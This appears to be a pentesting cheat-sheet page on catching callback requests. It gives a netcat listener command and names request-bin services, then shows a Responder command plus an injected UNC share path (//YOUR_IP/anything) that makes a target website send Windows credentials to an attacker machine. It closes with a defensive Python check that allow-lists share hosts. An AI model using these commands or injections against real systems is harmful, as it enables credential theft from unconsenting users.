Request Grabber
During pentesting activities, we may want to catch HTTP requests, such as during a CSRF attack or an XSS attack.
If our machine is network accessible, we can use nc:
$ nc -lnvp PORT
<send request to YOUR_PUBLIC_IP:PORT>
Otherwise, we may use online public solutions.
For instance, we can use API Testing Platforms:
- requestbin
- postbin
- ngrok
- ...
Additional tools
Responder
You can use responder to catch Windows authentication requests.
For instance, a website may be using SMB to access some shares based on the user input. If we inject a share leading to our machine, we may be able to grab credentials.
$ sudo responder -i IP -I tun0
In the previous example, if we inject //YOUR_IP/anything and the website was configured to use the current user's credentials to connect to the share, then you will receive them, and will have to crack them.
Note: It works with SMB, LDAP, etc.
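A server-side check against the share injection described above, as an added example that is not part of the original page: it extracts the host a user-supplied Windows-style path would make the server contact and only permits hosts on an allow-list. `ALLOWED_SHARE_HOSTS`, the function names and the sample paths are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: the only file server this application is meant to reach.
ALLOWED_SHARE_HOSTS = {"files.internal.example"}


def remote_host(user_path):
    """Return the host a Windows-style path points at, "" if the host
    cannot be determined, or None when the path is local."""
    p = user_path.strip().replace("\\", "/")  # \\host\share == //host/share
    if p.lower().startswith("file:"):
        try:
            url = urlsplit(p)
        except ValueError:
            return ""  # unparseable URL: treat as remote so it is rejected
        if url.hostname and url.hostname != "localhost":
            return url.hostname.lower()
        p = url.path  # file:///C:/x or file:////host/share
    if not p.startswith("//"):
        return None  # drive-letter or relative path, no network host
    parts = p.lstrip("/").split("/")
    if parts[0] in ("?", "."):  # device namespace: \\?\... or \\.\...
        if len(parts) > 1 and parts[1].upper() == "UNC":
            return parts[2].lower() if len(parts) > 2 else ""
        return None  # e.g. \\?\C:\dir is still a local path
    return parts[0].lower()


def share_access_permitted(user_path):
    """True when the path is local or its host is on the allow-list."""
    host = remote_host(user_path)
    return host is None or host in ALLOWED_SHARE_HOSTS


if __name__ == "__main__":
    samples = [  # constructed inputs; 192.0.2.10 is a documentation address
        "//192.0.2.10/anything",
        r"\\192.0.2.10\anything",
        r"\\?\UNC\192.0.2.10\anything",
        "file://192.0.2.10/anything/a.txt",
        r"\\FILES.internal.example\public\a.txt",
        r"C:\reports\q1.pdf",
    ]
    for s in samples:
        verdict = "allow" if share_access_permitted(s) else "reject"
        print(f"{verdict:6} host={remote_host(s)!r:26} {s}")
```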